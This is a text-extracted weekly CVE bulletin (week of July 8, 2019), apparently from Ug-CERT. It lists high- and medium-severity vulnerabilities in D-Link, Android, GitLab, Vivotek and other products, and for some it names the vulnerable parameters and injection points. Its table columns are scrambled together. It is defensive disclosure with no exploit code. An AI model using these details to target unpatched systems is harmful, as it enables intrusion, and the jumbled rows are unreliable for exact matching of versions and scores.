Vulnerability Summary for the Week of July 8, 2019
The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores: • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0 • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9 • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9 Entries may include additional information provided by organizations and efforts sponsored by Ug-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of Ug- CERT analysis.
High Vulnerabilities
CVS Source Primary Publish S Description & Patch Vendor -- Product ed Scor Info e
CVE- Contao 4.x allows SQL 2019- 2019- contao -- contao Injection. Fixed in Contao 7.5 07-09 11512 4.4.39 and Contao 4.7.5. MISC
/web/Lib/Action/IndexAction. class.php in D-Link Central WiFi Manager CWM(100) CVE- before v1.03R0100_BETA6 2019- dlink -- allows remote attackers to 13372 2019- central_wifimanage execute arbitrary PHP code via 7.5 MISC 07-06 r a cookie because a cookie's CONFI username field allows eval RM injection, and an empty MISC password bypasses authentication. CVS Source Primary Publish S Description & Patch Vendor -- Product ed Scor Info e
An issue was discovered in the D-Link Central WiFi Manager CVE- CWM(100) before 2019- dlink -- v1.03R0100_BETA6. Input 13373 2019- central_wifimanage does not get validated and 7.5 MISC 07-06 r arbitrary SQL statements can CONFI be executed in the database via RM the /web/Public/Conn.php MISC parameter dbSQL.
A SQL Injection was discovered in D-Link Central CVE- WiFi Manager CWM(100) 2019- dlink -- before v1.03R0100_BETA6 in 13375 2019- central_wifimanage PayAction.class.php with the 7.5 MISC 07-06 r index.php/Pay/passcodeAuth CONFI parameter passcode. The RM vulnerability does not need any MISC authentication.
D-Link DIR-655 C devices CVE- before 3.02B05 BETA03 allow 2019- remote attackers to execute dlink -- dir- 2019- 13561 arbitrary commands via shell 10.0 655_firmware 07-11 MISC metacharacters in the MISC online_firmware_check.cgi MISC check_fw_url parameter.
An issue was discovered on D- Link DIR-818LW devices with CVE- firmware 2.06betab01. There 2019- dlink -- dir- is a command injection in 2019- 9.0 13481 818lw_firmware HNAP1 (exploitable with 07-10 BID Authentication) via shell MISC metacharacters in the MTU field to SetWanSettings. CVS Source Primary Publish S Description & Patch Vendor -- Product ed Scor Info e
An issue was discovered on D- Link DIR-818LW devices with CVE- firmware 2.06betab01. There 2019- dlink -- dir- is a command injection in 2019- 10.0 13482 818lw_firmware HNAP1 (exploitable with 07-10 BID Authentication) via shell MISC metacharacters in the Type field to SetWanSettings.
Dynacolor FCM-MB40 v1.2.0.0 devices allow remote attackers to execute arbitrary commands via a crafted CVE- fortinet -- fcm- parameter to a CGI script, as 2019- 2019- 9.0 mb40_firmware demonstrated by sed injection 07-07 13398 in cgi- MISC bin/camctrl_save_profile.cgi (save parameter) and cgi- bin/ddns.cgi.
In ihevcd_sao_shift_ctb of ihevcd_sao.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code CVE- execution with no additional 2019- execution privileges needed. 2019- google -- android 9.3 2106 User interaction is needed for 07-08 CONFI exploitation. Product: Android. RM Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A- 130023983.
In ihevcd_parse_pps of 2019- CVE- google -- android 9.3 ihevcd_parse_headers.c, there 07-08 2019- CVS Source Primary Publish S Description & Patch Vendor -- Product ed Scor Info e
is a possible out of bounds 2107 write due to a missing bounds CONFI check. This could lead to RM remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-130024844.
In MakeMPEG4VideoCodecSpec ificData of AVIExtractor.cpp, there is a possible out of bounds write due to an incorrect bounds check. This CVE- could lead to remote code 2019- 2019- google -- android execution with no additional 9.3 2109 07-08 execution privileges needed. CONFI User interaction is needed for RM exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1. Android ID: A-130651570.
In loop of DnsTlsSocket.cpp, there is a possible heap memory corruption due to a CVE- use after free. This could lead 2019- 2019- google -- android to remote code execution in 7.5 2111 07-08 the netd server with no CONFI additional execution privileges RM needed. User interaction is not needed for exploitation. CVS Source Primary Publish S Description & Patch Vendor -- Product ed Scor Info e
Product: Android. Versions: Android-9. Android ID: A- 122856181.
In several functions of alarm.cc, there is possible memory corruption due to a use after free. This could lead CVE- to local code execution with no 2019- additional execution privileges 2019- google -- android 7.2 2112 needed. User interaction is not 07-08 CONFI needed for exploitation. RM Product: Android. Versions: Android-8.0 Android-8.1 Android-9. Android ID: A- 117997080.
CVE- hidea.com AZ Admin 1.0 has 2019- 2019- hidea -- az_admin news_det.php?cod= SQL 7.5 07-11 13507 Injection. MISC
An issue was discovered in CVE- Hsycms V1.1. There is a SQL 2019- 2019- hsycms -- hsycms 7.5 injection vulnerability via a 07-10 10653 /news/*.html page. MISC
A use-after-free in onig_new_deluxe() in regext.c in Oniguruma 6.9.2 allows CVE- attackers to potentially cause 2019- oniguruma_project 2019- information disclosure, denial 7.5 13224 -- oniguruma 07-10 of service, or possibly code CONFI execution by providing a RM crafted regular expression. The attacker provides a pair of a CVS Source Primary Publish S Description & Patch Vendor -- Product ed Scor Info e
regex pattern and a string, with a multi-byte encoding that gets handled by onig_new_deluxe(). Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust.
The strong_password gem CVE- 0.0.7 for Ruby, as distributed 2019- strong_password_p on RubyGems.org, included a 13354 2019- roject -- code-execution backdoor 7.5 MISC 07-08 strong_password inserted by a third party. The MISC current version, without this MISC backdoor, is 0.0.6. MISC
An issue was discovered in the CVE- Teclib Fields plugin through 2019- 1.9.2 for GLPI. it allows SQL 12723 teclib-edition -- 2019- Injection via container_id and 7.5 MISC fields 07-10 old_order parameters to MISC ajax/reorder.php by an CONFI unauthenticated user. RM
Trape through 2019-05-08 has CVE- SQL injection via the data[2] trape_project -- 2019- 2019- variable in core/db.py, as 7.5 trape 07-10 13489 demonstrated by the /bs t MISC parameter.
CVE- TYPO3 8.x through 8.7.26 and 2019- 9.x through 9.5.7 allows 2019- typo3 -- typo3 7.5 12747 Deserialization of Untrusted 07-09 CONFI Data. RM CVS Source Primary Publish S Description & Patch Vendor -- Product ed Scor Info e
CVE- Vivotek FD8136 devices allow 2018- vivotek -- 2019- Remote Command Injection, 10.0 14494 fd8136_firmware 07-10 related to BusyBox and wget. MISC MISC
Vivotek FD8136 devices allow CVE- Remote Command Injection, 2018- vivotek -- aka "another command 2019- 10.0 14495 fd8136_firmware injection vulnerability in our 07-10 MISC target device," a different issue MISC than CVE-2018-14494.
Vivotek FD8136 devices allow remote memory corruption and CVE- remote code execution because 2018- vivotek -- 2019- of a stack-based buffer 7.5 14496 fd8136_firmware 07-10 overflow, related to sprintf, MISC vlocal_buff_4326, and MISC set_getparam.cgi.
The Yoast SEO plugin before CVE- 11.6-RC5 for WordPress does 2019- 2019- yoast -- yoast_seo 7.5 not properly restrict unfiltered 07-09 13478 HTML in term descriptions. MISC
Back to top
Medium Vulnerabilities CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
posix/JackSocket.cpp in libjack in JACK2 1.9.1 through 1.9.12 (as distributed with alsa- plugins 1.1.7 and later) has a "double file descriptor close" issue during a failed connection attempt CVE- when jackd2 is not 2019- 2019- alsa-project -- alsa running. Exploitation 6.8 13351 07-05 success depends on MISC multithreaded timing of MISC that double close, which can result in unintended information disclosure, crashes, or file corruption due to having the wrong file associated with the file descriptor.
CVE- iart.php in XAMPP 2019- 1.7.0 has XSS, a related 2019- apachefriends -- xampp 4.3 8920 issue to CVE-2008- 07-09 BID 3569. MISC
mq_parse_http in CVE- mongoose.c in 2019- 2019- cesanta -- mongoose Mongoose 6.15 has a 5.0 13503 07-10 heap-based buffer over- MISC read. MISC cisco -- A vulnerability in the 2019- CVE- unified_communications_man Session Initiation 5.0 07-05 2019- ager Protocol (SIP) protocol CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
implementation of 1887 Cisco Unified CISCO Communications Manager could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to insufficient validation of input SIP traffic. An attacker could exploit this vulnerability by sending a malformed SIP packet to an affected Cisco Unified Communications Manager. A successful exploit could allow the attacker to trigger a new registration process on all connected phones, temporarily disrupting service.
Codedoc v3.2 has a stack-based buffer CVE- overflow in 2019- 2019- codedoc_project -- codedoc 6.8 add_variable in 07-06 13362 codedoc.c, related to MISC codedoc_strlcpy.
An authentication CVE- bypass vulnerability in 2019- 2019- crudlab -- wp_like_button 5.0 the CRUDLab WP Like 07-05 13344 Button plugin through MISC CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
1.6.0 for WordPress MISC allows unauthenticated MISC attackers to change settings. The contains() function in wp_like_button.php did not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update settings, as demonstrated by the wp- admin/admin.php?page =facebook-like-button each_page_url or code_snippet parameter.
Cross-site request forgery (CSRF) vulnerability in WP CVE- Open Graph 1.6.1 and custom4web -- 2019- 2019- earlier allows remote 6.8 wp_open_graph 07-05 5960 attackers to hijack the JVN authentication of administrators via unspecified vectors.
Digisol Wireless Wifi Home Router HR-3300 CVE- digisol -- dg-hr- allows XSS via the 2019- 2018- 4.3 3300_firmware userid or password 07-05 14027 parameter to the admin MISC login page. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
A cross-site scripting (XSS) vulnerability in resource view in PayAction.class.php in CVE- D-Link Central WiFi 2019- Manager CWM(100) 13374 before 2019- dlink -- central_wifimanager 4.3 MISC v1.03R0100_BETA6 07-06 CONFI allows remote attackers RM to inject arbitrary web MISC script or HTML via the index.php/Pay/passcode Auth passcode parameter.
D-Link DIR-655 C devices before 3.02B05 CVE- BETA03 allow remote 2019- attackers to force a 2019- 13560 dlink -- dir-655_firmware 5.0 blank password via the 07-11 MISC apply_sec.cgi MISC setup_wizard MISC parameter.
D-Link DIR-655 C devices before 3.02B05 BETA03 allow XSS, as demonstrated by the CVE- /www/ping_response.c 2019- gi ping_ipaddr 2019- 13562 dlink -- dir-655_firmware parameter, the 4.3 07-11 MISC /www/ping6_response. MISC cgi ping6_ipaddr MISC parameter, and the /www/apply_sec.cgi html_response_return_ page parameter. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
CVE- D-Link DIR-655 C 2019- devices before 3.02B05 2019- 13563 dlink -- dir-655_firmware BETA03 allow CSRF 6.8 07-11 MISC for the entire MISC management console. MISC
Dropbox.exe (and QtWebEngineProcess.e xe in the Web Helper) in the Dropbox desktop CVE- application 71.4.108.0 2019- store cleartext 2019- dropbox -- dropbox 4.3 12171 credentials in memory 07-08 MISC upon successful login MISC or new account creation. These are not securely freed in the running process.
The Appointment Hour CVE- Booking plugin 1.1.44 2019- dwbooster -- for WordPress allows 2019- 4.3 13505 appointment_hour_booking XSS via the E-mail 07-11 MISC field, as demonstrated MISC by email_1.
Unauthenticated Stored XSS in osTicket 1.10.1 allows a remote attacker to gain admin CVE- privileges by injecting 2019- 2019- enhancesoft -- osticket 4.3 arbitrary web script or 07-09 13397 HTML via arbitrary file MISC extension while creating a support ticket. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
An issue was CVE- discovered in Eventum 2018- 3.5.0. 2019- 12621 eventum_project -- eventum /htdocs/switch.php has 5.8 07-05 MISC an Open Redirect via CONFI the current_page RM parameter.
An issue was CVE- discovered in Eventum 2018- 3.5.0. 2019- 12622 eventum_project -- eventum 4.3 htdocs/ajax/update.php 07-10 MISC has XSS via the CONFI field_name parameter. RM
An issue was CVE- discovered in Eventum 2018- 3.5.0. 2019- 12623 eventum_project -- eventum htdocs/switch.php has 4.3 07-10 MISC XSS via the CONFI current_page RM parameter.
An issue was CVE- discovered in Eventum 2018- 3.5.0. 2019- 12625 eventum_project -- eventum 4.3 /htdocs/validate.php 07-10 MISC has XSS via the values CONFI parameter. RM
An issue was CVE- discovered in Eventum 2018- 3.5.0. 2019- 12626 eventum_project -- eventum 4.3 /htdocs/popup.php has 07-10 MISC XSS via the cat CONFI parameter. RM CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
An issue was discovered in Eventum CVE- 3.5.0. /htdocs/list.php 2018- has XSS via the 2019- 12627 eventum_project -- eventum 4.3 show_notification_list_ 07-10 MISC issues or CONFI show_authorized_issue RM s parameter.
An issue was CVE- discovered in Eventum 2018- 3.5.0. CSRF in 2019- 12628 eventum_project -- eventum htdocs/manage/users.ph 6.8 07-10 MISC p allows creating CONFI another user with RM admin privileges.
There is an out-of- CVE- bounds read in 2019- Exiv2::MrwImage::rea 2019- 13504 exiv2 -- exiv2 4.3 dMetadata in 07-10 BID mrwimage.cpp in Exiv2 MISC through 0.27.2. MISC
In FFmpeg 4.1.3, there CVE- is a division by zero at 2019- adx_write_trailer in 13390 libavformat/rawenc.c. BID 2019- ffmpeg -- ffmpeg This may be related to 4.3 MISC 07-07 two NULL pointers MISC passed as arguments at MISC libavcodec/frame_threa MISC d_encoder.c. MISC
Cross-site request 2019- CVE- fla-shop -- html5_maps 6.8 forgery (CSRF) 07-05 2019- CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
vulnerability in 5983 HTML5 Maps 1.6.5.6 MISC and earlier allows MISC remote attackers to MISC hijack the authentication of administrators via unspecified vectors.
CVE- Flarum before 0.1.0- 2019- beta.9 allows CSRF 13183 against all POST 2019- CONFI flarum -- flarum endpoints, as 6.8 07-07 RM demonstrated by MISC changing admin CONFI settings. RM
Dynacolor FCM-MB40 v1.2.0.0 devices have a CVE- fortinet -- fcm- hard-coded SSL/TLS 2019- 2019- 4.3 mb40_firmware key that is used during 07-07 13399 an administrator's SSL MISC conversation.
Dynacolor FCM-MB40 v1.2.0.0 use /etc/appWeb/appweb.pa ss to store CVE- administrative web- fortinet -- fcm- 2019- 2019- interface credentials in 5.0 mb40_firmware 07-07 13400 cleartext. These MISC credentials can be retrieved via cgi- bin/getuserinfo.cgi?mo de=info. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
Dynacolor FCM-MB40 CVE- fortinet -- fcm- v1.2.0.0 devices have 2019- 2019- 6.8 mb40_firmware CSRF in all scripts 07-07 13401 under cgi-bin/. MISC
/usr/sbin/default.sh and /usr/apache/htdocs/cgi- bin/admin/hardfactoryd efault.cgi on Dynacolor FCM-MB40 v1.2.0.0 CVE- fortinet -- fcm- devices implement an 2019- 2019- 6.5 mb40_firmware incomplete factory- 07-07 13402 reset process. A MISC backdoor can persist because neither system accounts nor the set of services is reset.
Gitea 1.7.2, 1.7.3 is affected by: Cross Site Scripting (XSS). The impact is: execute JavaScript in victim's CVE- browser, when the 2019- 2019- gitea -- gitea vulnerable repo page is 4.3 101031 07-11 loaded. The component 4 is: repository's MISC description. The attack vector is: victim must navigate to public and affected repo page.
An issue was CVE- discovered in GitLab 2018- 2019- gitlab -- gitlab Community and 4.3 19493 07-10 Enterprise Edition 11.x BID before 11.3.11, 11.4.x CONFI CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
before 11.4.8, and RM 11.5.x before 11.5.1. MISC There is a persistent XSS vulnerability in the environment pages due to a lack of input validation and output encoding.
An issue was discovered in GitLab Community and Enterprise Edition 11.x CVE- before 11.3.11, 11.4.x 2018- before 11.4.8, and 2019- 19494 gitlab -- gitlab 11.5.x before 11.5.1. 4.0 07-10 CONFI There is an incorrect RM access vulnerability MISC that allows an unauthorized user to view private group names.
An issue was discovered in GitLab Community and CVE- Enterprise Edition 2018- before 11.3.11, 11.4.x 2019- 19495 gitlab -- gitlab 4.0 before 11.4.8, and 07-10 CONFI 11.5.x before 11.5.1. RM There is an SSRF MISC vulnerability in the Prometheus integration.
An issue was CVE- 2019- gitlab -- gitlab discovered in GitLab 4.0 2018- 07-10 Community and 19496 CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
Enterprise Edition 10.x CONFI and 11.x before RM 11.3.11, 11.4.x before MISC 11.4.8, and 11.5.x before 11.5.1. There is an incorrect access control vulnerability that permits a user with insufficient privileges to promote a project milestone to a group milestone.
GitLab CE/EE, versions 8.8 up to 11.x before 11.3.11, 11.4 CVE- before 11.4.8, and 11.5 2018- before 11.5.1, are 19569 vulnerable to an 2019- gitlab -- gitlab 6.5 BID authorization 07-10 CONFI vulnerability that RM allows access to the MISC web-UI as a user using a Personal Access Token of any scope.
GitLab CE/EE, versions 8.18 up to 11.x CVE- before 11.3.11, 11.4 2018- before 11.4.8, and 11.5 2019- gitlab -- gitlab 4.0 19571 before 11.5.1, are 07-10 MISC vulnerable to an SSRF MISC vulnerability in webhooks.
GitLab CE 8.17 and 2019- CVE- gitlab -- gitlab 4.3 later and EE 8.3 and 07-10 2018- CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
later have a symlink 19572 time-of-check-to-time- CONFI of-use race condition RM that would allow MISC unauthorized access to files in the GitLab Pages chroot environment. This is fixed in versions 11.5.1, 11.4.8, and 11.3.11.
GitLab CE/EE, versions 10.1 up to 11.x before 11.3.11, 11.4 CVE- before 11.4.8, and 11.5 2018- before 11.5.1, are 19575 2019- gitlab -- gitlab vulnerable to an 4.0 BID 07-10 insecure direct object CONFI reference issue that RM allows a user to make MISC comments on a locked issue.
GitLab CE/EE, versions 8.6 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are CVE- vulnerable to an access 2018- 2019- gitlab -- gitlab control issue that 6.4 19576 07-10 allows a Guest user to MISC make changes to or MISC delete their own comments on an issue, after the issue was made Confidential. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
Gitlab CE/EE, versions 8.6 up to 11.x before 11.3.11, 11.4 before CVE- 11.4.8, and 11.5 before 2018- 11.5.1, are vulnerable 2019- 19577 gitlab -- gitlab to an incorrect access 5.0 07-10 CONFI control vulnerability RM that displays to an MISC unauthorized user the title and namespace of a confidential issue.
GitLab EE, version 11.5 before 11.5.1, is CVE- vulnerable to an 2018- insecure object 2019- 19578 gitlab -- gitlab reference issue that 4.0 07-10 CONFI permits a user with RM Reporter privileges to MISC view the Jaeger Tracing Operations page.
All versions of GitLab CVE- prior to 11.5.1, 11.4.8, 2018- and 11.3.11 do not send 2019- 19580 gitlab -- gitlab an email to the old 5.0 07-10 CONFI email address when an RM email address change is MISC made.
GitLab EE, versions 8.3 CVE- up to 11.x before 2018- 11.3.11, 11.4 before 2019- 19581 gitlab -- gitlab 11.4.8, and 11.5 before 5.0 07-10 CONFI 11.5.1, is vulnerable to RM an insecure object MISC reference vulnerability CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
that allows a Guest user to set the weight of an issue they create.
GitLab EE, versions 11.4 before 11.4.8 and 11.5 before 11.5.1, is CVE- affected by an insecure 2018- direct object reference 2019- 19582 gitlab -- gitlab vulnerability that 4.0 07-10 CONFI permits an RM unauthorized user to MISC publish the draft merge request comments of another user.
GitLab CE/EE, versions 8.0 up to 11.x before 11.3.11, 11.4 CVE- before 11.4.8, and 11.5 2018- before 11.5.1, would 2019- 19583 gitlab -- gitlab log access tokens in the 4.0 07-10 CONFI Workhorse logs, RM permitting MISC administrators with access to the logs to see another user's token.
GitLab EE, versions 11.x before 11.3.11, CVE- 11.4 before 11.4.8, and 2018- 11.5 before 11.5.1, is 2019- 19584 gitlab -- gitlab vulnerable to an 5.0 07-10 CONFI insecure direct object RM reference vulnerability MISC that allows authenticated, but CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
unauthorized, users to view members and milestone details of private groups.
In FileInputStream::Read of file_input_stream.cc, there is a possible memory corruption due to uninitialized data. This could lead to remote code execution in an unprivileged CVE- process with no 2019- 2019- google -- android additional execution 6.8 2105 07-08 privileges needed. User CONFI interaction is needed RM for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android- 7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A- 116114182.
In save_attr_seq of sdp_discovery.cc, there is a possible out-of- bound read due to a CVE- missing bounds check. 2019- 2019- google -- android This could lead to 5.0 2116 07-08 remote information CONFI disclosure with no RM additional execution privileges needed. User interaction is not CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android- 7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A- 117105007.
CVE- Helpy before 2.2.0 2018- 2019- helpy.io -- helpy allows agents to edit 6.5 20851 07-10 admins. MISC MISC
IBM Application Performance Management (IBM CVE- Monitoring 8.1.4) could 2019- ibm -- allow a remote attacker 2019- 4131 cloud_application_performan to induce the 5.0 07-11 XF ce_management application to perform CONFI server-side DNS RM lookups of arbitrary domain names. IBM X- Force ID: 158270.
IBM Jazz for Service Management 1.1.3 and 1.1.3.2 stores sensitive CVE- information in URL 2019- ibm -- parameters. This may 2019- 4193 jazz_for_service_managemen 5.0 lead to information 07-11 CONFI t disclosure if RM unauthorized parties XF have access to the URLs via server logs, CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
referrer header or browser history. IBM X-force ID: 159032.
iDoors Reader 2.10.17 and earlier allows an attacker on the same CVE- network segment to 2019- 2019- idoors -- idoors_reader bypass authentication 5.8 5964 07-05 to access the MISC management console MISC and operate the product via unspecified vectors.
index.php/admin/permi CVE- ssions in Ignited CMS ignitedcms_project -- 2019- 2019- through 2017-02-19 6.8 ignitedcms 07-06 13370 allows CSRF to add an MISC administrator.
In ImageMagick 7.0.8- 50 Q16, CVE- ComplexImages in 2019- MagickCore/fourier.c 2019- 13391 imagemagick -- imagemagick has a heap-based buffer 6.8 07-07 MISC over-read because of MISC incorrect calls to MISC GetCacheViewVirtualP ixels.
ImageMagick 7.0.8-54 CVE- Q16 allows Division by 2019- Zero in 2019- imagemagick -- imagemagick 4.3 13454 RemoveDuplicateLayer 07-09 BID s in MISC MagickCore/layer.c. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
MISC MISC
CVE- Intersystems Cache 2019- 2018- intersystems -- cache 2017.2.2.865.0 allows 4.3 07-11 17150 XSS. MISC
Intersystems Cache CVE- 2017.2.2.865.0 has 2019- 2018- intersystems -- cache 5.5 Incorrect Access 07-11 17151 Control. MISC
CVE- Intersystems Cache 2019- 2018- intersystems -- cache 2017.2.2.865.0 allows 5.5 07-11 17152 XXE. MISC
Invoxia NVX220 devices allow access to CVE- /bin/sh via escape from 2019- 2018- invoxia -- nvx220_firmware 5.0 a restricted CLI, 07-05 14529 leading to disclosure of MISC password hashes.
Cross-site scripting vulnerability in Joruri CVE- CMS 2017 Release2 2019- and earlier allows 2019- joruri -- joruri_cms_2017 4.3 5967 remote attackers to 07-05 MISC inject arbitrary web MISC script or HTML via unspecified vectors. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
Open redirect vulnerability in Joruri Mail 2.1.4 and earlier CVE- allows remote attackers 2019- 2019- joruri -- joruri_mail to redirect users to 5.8 5965 07-05 arbitrary web sites and MISC conduct phishing MISC attacks via unspecified vectors.
Joruri Mail 2.1.4 and earlier does not properly manage CVE- sessions, which allows 2019- remote attackers to 2019- joruri -- joruri_mail 5.8 5966 impersonate an 07-05 MISC arbitrary user and MISC alter/disclose the information via unspecified vectors.
KEYNTO Team Password Manager CVE- 1.5.0 allows XSS 2019- keynto -- 2019- because data saved 4.3 13380 team_password_manager 07-09 from websites is FULL mishandled in the DISC online vault.
An issue has been found in third-party CVE- PNM decoding 2018- associated with libpng 2019- libpng -- libpng 6.8 14550 1.6.35. It is a stack- 07-10 MISC based buffer overflow MISC in the function get_token in CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
pnm2png.c in pnm2png.
Mailvelope prior to 3.1.0 is vulnerable to a clickjacking attack against the settings page. As the settings page is intended to be accessible from web applications, the CVE- browser's extension 2019- isolation mechanisms 2019- mailvelope -- mailvelope 4.3 9147 are disabled 07-09 CONFI (web_accessible_resour RM ces). Mailvelope implements additional measures to prevent web applications from directly embedding the settings page, but this mechanism can be bypassed.
Mailvelope prior to 3.3.0 accepts or operates with invalid PGP public keys: Mailvelope allows CVE- importing keys that 2019- contain users without a 2019- mailvelope -- mailvelope 4.3 9148 valid self-certification. 07-09 CONFI Keys that are obviously RM invalid are not rejected during import. An attacker that is able to get a victim to import a manipulated key could CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
claim to have signed a message that originates from another person.
Mailvelope prior to 3.3.0 allows private key operations without user interaction via its client-API. By modifying an URL parameter in Mailvelope, an attacker CVE- is able to sign (and 2019- encrypt) arbitrary 2019- mailvelope -- mailvelope 6.4 9149 messages with 07-09 CONFI Mailvelope, assuming RM the private key password is cached. A second vulnerability allows an attacker to decrypt an arbitrary message when the GnuPG backend is used in Mailvelope.
Mailvelope prior to 3.3.0 does not require user interaction to CVE- import public keys 2019- shown on web page. 2019- mailvelope -- mailvelope 5.0 9150 This functionality can 07-09 CONFI be tricked to either hide RM a key import from the user or obscure which key was imported. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
The Android App 'Tootdon for Mastodon' version 3.4.1 and earlier does not verify CVE- X.509 certificates from 2019- mastodon-tootdon -- SSL servers, which 2019- 5.8 5961 tootdon_for_mastodon allows man-in-the- 07-05 MISC middle attackers to MISC spoof servers and obtain sensitive information via a crafted certificate.
CVE- 2019- 12466 CONFI Wikimedia MediaWiki 2019- RM mediawiki -- mediawiki through 1.32.1 allows 6.8 07-10 MISC CSRF. BUGT RAQ DEBIA N
Wikimedia MediaWiki CVE- 1.23.0 through 1.32.1 2019- has an information 12474 leak. Privileged API CONFI responses that include 2019- RM mediawiki -- mediawiki whether a recent 5.0 07-10 MISC change has been BUGT patrolled may be RAQ cached publicly. Fixed DEBIA in 1.32.2, 1.31.2, 1.30.2 N and 1.27.6. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
The Odoo Community CVE- Association (OCA) 2018- dbfilter_from_header 14733 module makes Odoo CONFI 2019- odoo -- odoo 8.x, 9.x, 10.x, and 11.x 5.0 RM 07-05 vulnerable to ReDoS MISC (regular expression MISC denial of service) under MISC certain circumstances. MISC
A NULL Pointer Dereference in match_at() in regexec.c in Oniguruma 6.9.2 allows attackers to CVE- potentially cause denial 2019- oniguruma_project -- of service by providing 2019- 5.0 13225 oniguruma a crafted regular 07-10 CONFI expression. Oniguruma RM issues often affect Ruby, as well as common optional libraries for PHP and Rust.
lib/DocumentToText.p hp in OpenCats before CVE- 0.9.4-3 has XXE that 2019- allows remote users to 2019- 13358 opencats -- opencats read files on the 4.3 07-05 MISC underlying operating MISC system. The attacker MISC must upload a file in the docx or odt format.
An issue was 2019- CVE- otrs -- otrs 4.9 discovered in Open 07-08 2018- CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
Ticket Request System 11563 (OTRS) 6.0.x through CONFI 6.0.7. A carefully RM constructed email could CONFI be used to inject and RM execute arbitrary MISC stylesheet or JavaScript code in a logged in customer's browser in the context of the OTRS customer panel application.
paypal/adaptivepaymen ts-sdk-php v3.9.2 is CVE- vulnerable to a paypal -- 2019- 2017- reflected XSS in the 4.3 adaptive_payments_sdk 07-10 6217 SetPaymentOptions.ph MISC p resulting code execution
PHPWind 9.1.0 has CVE- XSS vulnerabilities in 2019- 2019- phpwind -- phpwind 4.3 the c and m parameters 07-09 13472 of the index.php file. MISC
CVE- XSS exists in Ping 2019- pingidentity -- Identity Agentless 2019- 4.3 13564 agentless_integration_kit Integration Kit before 07-11 CONFI 1.5. RM
pyxtrlock 0.3 and CVE- earlier is affected by: 2019- pyxtrlock_project -- pyxtrlock 4.6 2019- Incorrect Access 07-11 101031 Control. The impact is: CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
False locking 6 impression when run in MISC a non-X11 session. The fixed version is: 0.4.
SAP Information CVE- Steward, version 4.2, 2019- does not sufficiently 0329 2019- sap -- information_steward encode user-controlled 4.3 BID 07-10 inputs, resulting in MISC Cross-Site Scripting CONFI (XSS) vulnerability. RM
Improper authorization vulnerability in VAIO Update 7.3.0.03150 and CVE- earlier allows an 2019- 2019- sony -- vaio_update attackers to execute 6.8 5981 07-05 arbitrary executable file MISC with administrative MISC privilege via unspecified vectors.
Improper download file verification vulnerability in VAIO Update 7.3.0.03150 and earlier allows remote CVE- attackers to conduct a 2019- man-in-the-middle 2019- sony -- vaio_update 5.4 5982 attack via a malicous 07-05 MISC wireless LAN access MISC point. A successful exploitation may result in a malicious file being downloaded/executed. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
CVE- The cachemgr.cgi web 2019- module of Squid 2019- 13345 squid-cache -- squid through 4.7 has XSS 4.3 07-05 MISC via the user_name or MISC auth parameter. MLIST
Cross-site scripting CVE- vulnerability in 2019- Attendance Manager 5970 sukimalab -- 0.5.6 and earlier allows 2019- 4.3 MISC attendance_manager remote attackers to 07-05 MISC inject arbitrary web MISC script or HTML via MISC unspecified vectors.
Cross-site request forgery (CSRF) CVE- vulnerability in 2019- Attendance Manager 5971 sukimalab -- 0.5.6 and earlier allows 2019- 6.8 MISC attendance_manager remote attackers to 07-05 MISC hijack the MISC authentication of MISC administrators via unspecified vectors.
Cross-site scripting vulnerability in Online CVE- Lesson Booking 0.8.6 2019- sukimalab -- and earlier allows 2019- 5972 4.3 online_lesson_booking remote attackers to 07-05 MISC inject arbitrary web MISC script or HTML via MISC unspecified vectors. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
